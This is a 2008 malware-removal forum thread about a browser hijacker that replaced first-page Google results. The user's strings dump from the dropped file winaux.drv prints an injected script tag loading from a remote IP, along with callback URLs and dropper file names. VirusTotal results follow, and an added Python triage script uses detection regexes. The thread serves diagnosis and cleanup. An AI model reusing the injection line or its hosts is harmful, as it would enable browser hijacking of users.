Google 1st Page Search Results Highlighted


This topic is locked
10 replies to this topic

#1 gltech
  • Members
  • 8 posts

Posted 17 August 2008 - 09:50 PM

Hello,

I've followed the instructions for uploading a HijackThis log. I've downloaded and run all the recommended software (AdAware, SpyBot, etc.). From what I could tell, they didn't seem to find anything significant, and I still have the same problem, which is:

I am using IE 6 and my home page is set to "http://www.google.com". Every time I do a google search, the first page is bogus/hijacked results (stuff like "dealtime.com", "shopping.com"). The page looks just like google, but it's not. But I can click "Next" at the bottom of the page, and I get page 2 of the REAL google results, and I can even then click "Previous" and I get page 1 of the REAL google results. So it only happens for the first "first page" of results for each search.

So here's my HijackThis log. Thanks in advance for the help!


**********************************************************************************************************************
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:51:29 PM, on 8/17/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\z2 Remote2PC\R2PCSH.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\devldr32.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\z2 Remote2PC\R2PCServ.exe
C:\Program Files\DynDNS Updater\DynDNS.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\GL\Temp\Temp\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [z2 R2PC Server Helper] "C:\Program Files\z2 Remote2PC\R2PCSH.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: AutorunsDisabled
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O17 - HKLM\System\CCS\Services\Tcpip\..\{42CDC7C4-F7EB-4E2B-A3B7-4FC4EB06E469}: NameServer = 192.168.254.102
O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: DynDNS Updater Service (DynDNS_Updater_Service) - Kana Solution - C:\Program Files\DynDNS Updater\DynDNS.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: z2 Remote2PC Server (z2 R2PC Server) - z2 Software - C:\Program Files\z2 Remote2PC\R2PCServ.exe

--
End of file - 18753 bytes

#2 gltech (Topic Starter)
  • Members
  • 8 posts

Posted 17 August 2008 - 10:22 PM

Thought I'd add that I used NetMon to see that, when I reproduce the problem all the traffic not going to google is going to 76.163.191.132.

#3 gltech (Topic Starter)
  • Members
  • 8 posts

Posted 17 August 2008 - 11:47 PM

As in my previous post, I used NetMon to find the IP address my system is hitting. I found a web page that said you could do this (from a command prompt):

ROUTE ADD 76.163.191.132 127.0.0.1

to block access to that ip address. I did that and the google search problem is gone. Of course I'm not saying that's the solution, I'm just providing more clues.

Oh, and another comment. I don't see how I got this in the first place, because I have all activex, java applets and anything like that disabled in my Internet Zone. I'm a software developer and have been running IE this way forever. This is the first time I've ever been infected with anything.

#4 teacup61 (Bleepin' Texan!)
  • Malware Response Team
  • 17,075 posts
  • Gender: Female
  • Location: Wills Point, Texas

Posted 18 August 2008 - 02:35 AM

Hello gltech,

Welcome to Bleeping Computer :thumbsup:

Let's see if there is an easy solution to this:

Please download WinHelp2002's DelDomains by right-clicking on the following link, and choosing "Save Target As":
http://www.mvps.org/winhelp2002/DelDomains.inf
Save the file to the desktop. Then go to the desktop, right click on DelDomains.inf, and choose Install. You may not see any noticeable changes or prompts; this is normal. Then please restart your computer.

Please download Malwarebytes' Anti-Malware from one of these places:
http://www.majorgeeks.com/Malwarebytes_Ant...ware_d5756.html
http://www.besttechie.net/tools/mbam-setup.exe

Double Click mbam-setup.exe to install the application.

* Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
* If an update is found, it will download and install the latest version.
* Once the program has loaded, select "Perform Quick Scan", then click Scan.
* The scan may take some time to finish, so please be patient.
* When the scan is complete, click OK, then Show Results to view the results.
* Make sure that everything is checked, and click Remove Selected.
* When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Extra Note)
* The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
* Copy&Paste the entire report in your next reply along with a fresh HijackThis log.

Extra Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts; click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately.

Thanks,
tea
Please make a donation so I can keep helping people just like you.
Every little bit helps! :)
You can even use your credit card! Thank you!

Error reading poptart in Drive A: Delete kids y/n?

#5 gltech (Topic Starter)
  • Members
  • 8 posts

Posted 18 August 2008 - 01:53 PM

Hello Tea,

Thanks so much for your help. I have performed the operations you recommended. The Anti-Malware application reported "No malicious items were detected". Immediately below is its log file, followed by a fresh HijackThis log as requested.

************************************************************************
Malwarebytes' Anti-Malware 1.25
Database version: 1066
Windows 5.1.2600 Service Pack 2

2:43:18 PM 8/18/2008
mbam-log-08-18-2008 (14-43-18).txt

Scan type: Quick Scan
Objects scanned: 79660
Time elapsed: 14 minute(s), 23 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


*********************************************************************************************************
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2:52:10 PM, on 8/18/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\z2 Remote2PC\R2PCSH.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\devldr32.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\z2 Remote2PC\R2PCServ.exe
C:\Program Files\DynDNS Updater\DynDNS.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\dllhost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Outlook Express\msimn.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\coolpro2\coolpro2.exe
C:\GL\Temp\Temp\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [z2 R2PC Server Helper] "C:\Program Files\z2 Remote2PC\R2PCSH.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: AutorunsDisabled
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O17 - HKLM\System\CCS\Services\Tcpip\..\{42CDC7C4-F7EB-4E2B-A3B7-4FC4EB06E469}: NameServer = 192.168.254.102
O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: DynDNS Updater Service (DynDNS_Updater_Service) - Kana Solution - C:\Program Files\DynDNS Updater\DynDNS.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: z2 Remote2PC Server (z2 R2PC Server) - z2 Software - C:\Program Files\z2 Remote2PC\R2PCServ.exe

--
End of file - 4890 bytes

#6 teacup61 (Bleepin' Texan!)
  • Malware Response Team
  • 17,075 posts
  • Gender: Female
  • Location: Wills Point, Texas

Posted 18 August 2008 - 03:01 PM

Hello,

So the problem is persisting?

Download the HostsXpert Here
http://www.funkytoad.com/download/HostsXpert.zip

Unzip HostsXpert to your desktop

Open up the HostsXpert program.

* Make sure that the "make hosts writable?" button in the upper left corner is enabled.
* Click back up Host files
* then click "Restore MS Hosts File"
* close program

Also... do you run a router? Please let me know. :thumbsup:

Thanks,
tea

#7 gltech (Topic Starter)
  • Members
  • 8 posts

Posted 18 August 2008 - 03:04 PM

News flash:

I used ProcessMonitor to look at the DLLs IE was using (it displays other files in addition to DLLs). I searched the web for each one (about 50 or so, whew!). I found one called "winaux.drv". When I searched the web for that one, I got no results. So I opened it up in a harmless editor, and voilà, it contains the 76.163.191.132 address. I removed the file from C:\Windows\System32 and my problem is gone.

While I had "winaux.drv" open in the editor, I noticed some interesting text strings:

<script src=//76.163.191.132/cp/></script>
http://76.163.190.49/cp/?u=5
http://76.163.124.43/cp/?v=5
iexplore
avant
browser
netcaptor
msn6
maxthon opera
firefox myie
inetadviser enigma
networker
theworld
netscape
mozilla surf
yahoo
msn live
icq google
yandex
rambler search
\winaux.drv
\tmp001.exe
\svgainit.drv

I looked in my System32 folder for those last two file names. "svgainit.drv" was there. I searched the web for that -- no results, so I assume it's a bogus file too. I removed it as well and it didn't seem to affect anything. I did not find "tmp001.exe" on my system, but a web search identified it AS MALWARE.

I'm gonna see how she runs for a couple of days.

Since the web search didn't turn up anything for "winaux.drv" or "svgainit.drv", is this some new unknown scumware? Should I report it somewhere?

I have traced the 76.163.191.132 to:

OrgName: Ecommerce Corporation
OrgID: ECOMM-5
Address: 247 Mitch Lane
City: Hopkinsville
StateProv: KY
PostalCode: 42240
Country: US

Should I call them? I assume they are an internet provider or hosting service and one of their customers is the culprit. Boy would I love to catch one of these scumbags. They would have a REALLY bad day.

gltech

#8 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 18 August 2008 - 03:11 PM

I think we're cross posting, but you can do this with those files to be sure:

Please navigate to the following file(s):

svgainit.drv
winaux.drv


Please go to VirusTotal and submit each file for a scan and post the results in your next reply.

#9 gltech

gltech
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  • Local time:12:56 PM

Posted 18 August 2008 - 03:28 PM

Here's the virustotal results for "winaux.drv" (looks like somebody already submitted it on 8/3):

**************************
File has already been analysed:
MD5: a166b3484ffd23371ad02ba0a8a0c3b5
First received: 08.03.2008 23:12:50 (CET)
Date: 08.03.2008 23:12:50 (CET) [>14D]
Results: 6/36
Permalink: analisis/48d34546929ec02ca7e03689eb6ad40e


File 4b9a22ae002534353882000136dc69005 received on 08.03.2008 23:12:50 (CET)
Current status: finished

Result: 6/36 (16.67%)
Antivirus Version Last Update Result
AhnLab-V3 - - -
AntiVir - - TR/Dldr.Delphi.Gen
Authentium - - -
Avast - - -
AVG - - -
BitDefender - - -
CAT-QuickHeal - - -
ClamAV - - -
DrWeb - - DLOADER.Trojan
eSafe - - -
eTrust-Vet - - -
Ewido - - -
F-Prot - - -
F-Secure - - -
Fortinet - - -
GData - - -
Ikarus - - Trojan.Win32.Delf.nf
K7AntiVirus - - -
Kaspersky - - -
McAfee - - -
Microsoft - - -
NOD32v2 - - -
Norman - - -
Panda - - Suspicious file
PCTools - - -
Prevx1 - - -
Rising - - -
Sophos - - Mal/Delf-M
Sunbelt - - -
Symantec - - -
TheHacker - - -
TrendMicro - - -
VBA32 - - -
ViRobot - - -
VirusBuster - - -
Webwasher-Gateway - - Trojan.Dldr.Delphi.Gen
Additional information
MD5: a166b3484ffd23371ad02ba0a8a0c3b5
SHA1: ef2fcf62914cb5b19262100d3f1373f1529315b2
SHA256: 010303068af154979e8b40afcf27e786d3d12d573cefe591a0bc65d903aa822c
SHA512: 1a64569e578901fe718c3ab15f4e18f0dd0455b7fc75d2ab917bee8408879e8299dc6e09aa89cd2a0e7bd8e2fa06b553d1f8df89cf63c0afda6b9398c1a7b8fb
***********************


and for "svgainit.drv" (seemed to be one virustotal hadn't seen):

File svgainit.drv received on 08.18.2008 22:22:58 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED


***********************
Result: 0/35 (0%)
Your file has expired or does not exists.

Antivirus Version Last Update Result
AhnLab-V3 2008.8.19.0 2008.08.18 -
AntiVir 7.8.1.19 2008.08.18 -
Authentium 5.1.0.4 2008.08.18 -
Avast 4.8.1195.0 2008.08.18 -
AVG 8.0.0.161 2008.08.18 -
BitDefender 7.2 2008.08.18 -
CAT-QuickHeal 9.50 2008.08.18 -
ClamAV 0.93.1 2008.08.18 -
DrWeb 4.44.0.09170 2008.08.18 -
eSafe 7.0.17.0 2008.08.18 -
eTrust-Vet 31.6.6035 2008.08.15 -
Ewido 4.0 2008.08.18 -
F-Prot 4.4.4.56 2008.08.18 -
F-Secure 7.60.13501.0 2008.08.18 -
Fortinet 3.14.0.0 2008.08.18 -
GData 2.0.7306.1023 2008.08.18 -
Ikarus T3.1.1.34.0 2008.08.18 -
K7AntiVirus 7.10.420 2008.08.18 -
Kaspersky 7.0.0.125 2008.08.18 -
McAfee 5363 2008.08.18 -
Microsoft 1.3807 2008.08.18 -
NOD32v2 3365 2008.08.18 -
Panda 9.0.0.4 2008.08.18 -
PCTools 4.4.2.0 2008.08.18 -
Prevx1 V2 2008.08.18 -
Rising 20.58.02.00 2008.08.18 -
Sophos 4.32.0 2008.08.18 -
Sunbelt 3.1.1546.1 2008.08.15 -
Symantec 10 2008.08.18 -
TheHacker 6.3.0.5.053 2008.08.18 -
TrendMicro 8.700.0.1004 2008.08.18 -
VBA32 3.12.8.3 2008.08.18 -
ViRobot 2008.8.18.1339 2008.08.18 -
VirusBuster 4.5.11.0 2008.08.18 -
Webwasher-Gateway 6.6.2 2008.08.18 -
Additional information
File size: 60 bytes
MD5...: 3e1761401891f7dfd479c9ba29b67f28
SHA1..: 18671233667defce2ebc83c6324755fa77a62f53
SHA256: 773261c087883d539f780e96811cdc4d74588da3cfcbac5cf79c025887d5975b
SHA512: 5535c73a06b1bec9a2f10f8ee91421825041e1d5ff8757736fa32cc6acf1a51e
a099662ede7cfbccefbe4690eda975870db072e09a30bb2bc8f0f030c680626e
PEiD..: -
PEInfo: -
*********************
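The triage gltech did by hand in post #7 (pull the readable strings out of an unknown driver file, look for embedded addresses and script tags) and the hash comparison against the VirusTotal report in post #9 can be scripted. The following is an added example written for this page; it is not code from the thread, from BleepingComputer, or from any participant. The byte string it runs on is a constructed stand-in containing the same kinds of strings gltech listed, not the real winaux.drv, and the MD5 it compares against is the one quoted from VirusTotal above.

```python
"""Offline strings-and-hash triage for a suspicious file (added example)."""
import hashlib
import re
import sys
from typing import Dict, List

# Constructed sample standing in for the dropped file. It mixes non-printable
# bytes with the kinds of strings gltech saw in winaux.drv; it is NOT the real file.
SAMPLE = (
    b"\x00\x01MZ\x90\x00junk\x00"
    b"<script src=//76.163.191.132/cp/></script>\x00"
    b"http://76.163.190.49/cp/?u=5\x00"
    b"iexplore\x00firefox\x00\\winaux.drv\x00\\tmp001.exe\x00"
)

# MD5 that VirusTotal reported for winaux.drv in post #9 (page value, not invented).
KNOWN_BAD_MD5 = "a166b3484ffd23371ad02ba0a8a0c3b5"

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")            # runs of 4+ printable ASCII bytes
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")       # dotted-quad addresses
URL = re.compile(r"https?://[^\s\"'<>]+")               # http/https URLs
SCRIPT_TAG = re.compile(r"<script[^>]*src=[^>]*>", re.I)  # injected script tags
DROPPED_FILE = re.compile(r"\\[\w.-]+\.(?:drv|exe|dll)", re.I)  # Windows file names


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return printable ASCII runs of at least min_len bytes, like the `strings` tool."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_indicators(data: bytes) -> Dict[str, List[str]]:
    """Scan each extracted string for network and file indicators.

    Regexes run per string so a match never spans two unrelated runs.
    Results are de-duplicated and sorted for stable comparison.
    """
    text = "\n".join(extract_strings(data))
    return {
        "ipv4": sorted(set(IPV4.findall(text))),
        "urls": sorted(set(URL.findall(text))),
        "script_tags": sorted(set(SCRIPT_TAG.findall(text))),
        "filenames": sorted(set(DROPPED_FILE.findall(text))),
    }


def file_hashes(data: bytes) -> Dict[str, str]:
    """MD5/SHA-1/SHA-256 digests, the identifiers VirusTotal keys its reports on."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def matches_known_hash(data: bytes, known_md5: str) -> bool:
    """True if the file is byte-identical to a sample already reported (by MD5)."""
    return file_hashes(data)["md5"] == known_md5.lower()


def triage(data: bytes) -> Dict[str, object]:
    """Bundle indicators, hashes and the known-sample check into one report."""
    return {
        "indicators": find_indicators(data),
        "hashes": file_hashes(data),
        "known_bad": matches_known_hash(data, KNOWN_BAD_MD5),
    }


if __name__ == "__main__":
    # Usage: python triage.py [path]; with no path the constructed SAMPLE is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    report = triage(blob)
    for key, values in report["indicators"].items():
        print(f"{key}: {values}")
    print("hashes:", report["hashes"])
    print("matches VirusTotal MD5 for winaux.drv:", report["known_bad"])
```

Embedded IP literals, a `<script src=...>` tag and a list of browser process names inside something named like a driver are what made the file stand out here; the hash step is what lets a later reader confirm they are looking at the same sample VirusTotal already saw rather than a renamed variant.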


#10 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 18 August 2008 - 04:16 PM

Hi,

Good....did you delete the first one then? On the second it said:

NOT FOUND STOPPED

and

Your file has expired or does not exists.

And didn't report it as bad in any case.

tea

#11 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 11 September 2008 - 05:22 PM

Since this issue appears resolved ... this Topic is closed.

If you need this topic reopened, please request this by sending the moderating team a PM with the address of the thread. This applies only to the original topic starter.

Everyone else please begin a New Topic.
